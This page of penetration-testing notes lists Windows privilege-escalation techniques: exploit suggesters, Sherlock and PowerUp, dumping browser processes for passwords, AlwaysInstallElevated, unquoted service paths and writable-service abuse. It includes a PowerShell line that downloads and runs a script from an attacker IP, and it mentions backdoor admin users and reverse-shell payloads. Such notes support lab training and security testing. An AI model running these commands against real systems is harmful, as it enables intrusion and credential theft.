Privesc Openings

Windows Exploiter Suggester

# https://github.com/bitsadmin/wesng

# 1. Copy and paste into system.txt in kali
Systeminfo	

# 2. Update windows exploit suggester. Will generate a .xls file 
python windows-exploit-suggester.py --update	

# 3. Start suggesting an exploit
python windows-exploit-suggester.py --database <generated xls> --systeminfo system.txt

Sherlock

Find All Vulns

# find-allvulns 1
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.32/Sherlock.ps1')	
find-allvulns

# find-allvulns 2
powershell.exe -exec bypass -Command "& {Import-Module .\Sherlock.ps1; find-allvulns}"

PowerUp Invoke-AllChecks

Alternatively

DLL Hijacking (PowerUp)

Dump Process

Dump process (eg. Browser) to find credentials . Transfer to kali and 'Strings' grep for login or passwords

Using Token and AutoLogon creds

PowerUp Invoke-AllCheck should find plaintext pass . Create privilege object to run reverse shell.

AlwaysInstallElevated

Always Install Elevated to create privesc user after installation.

ICALCS

Look for Folder permissions for (W) permissions. Overwrite with binary payload . For WinXP and Below: use cacls

WMIC

Syntax

Description

wmic qfe getCaption,Description,HotFixID,InstalledOn

Any missing patches

Check for exploits in exploit-db eg.:

searchsploit MS16 windows local

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB979682"

Windows Vista/2008 6.1.6000 x32,Windows Vista/2008 6.1.6001 x32,Windows 7 6.2.7600 x32,Windows 7/2008 R2 6.2.7600 x64. (no good exploit - unlikely Microsoft Windows Vista/7 - Elevation of Privileges (UAC Bypass))

wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB2393802"

Stored Credentials

wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%

32 or 64bit?

wmic useraccount get name, sid

Get list of user account names and SID

wmic logicaldisk get caption || fsutil fsinfo drives

List drives

Unquoted Service Paths

Privesc by uploading binary payload in service path to be executed eg. By service start/stop or reboot. How? Suppose we found: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe If you look at the registry entry for this service with Regedit you can see the ImagePath value is: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe

To be prevent it being exploited, the path should have been: C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find in sequence, hitting our exploit payload.

To discover unquoted service path

Writable Path (accesschk.exe > upnphost)

(1) Accesschk for any writable path (2) sc qc to query (3) method1: adding backdoor user to admin group (4) method2: adding binary payload

Querying Service

Method 1: Adding backdoor user to admin group

Method 2: Adding binary payload

Services Registry

Create exploit eg. Msfvenom exploit.exe and place in writable folder like 'temp'

Run service sc start regsvc

PreviousBasic checks / powershellNextLonelyPotato - SeImpersonatePrivilege

Last updated

Was this helpful?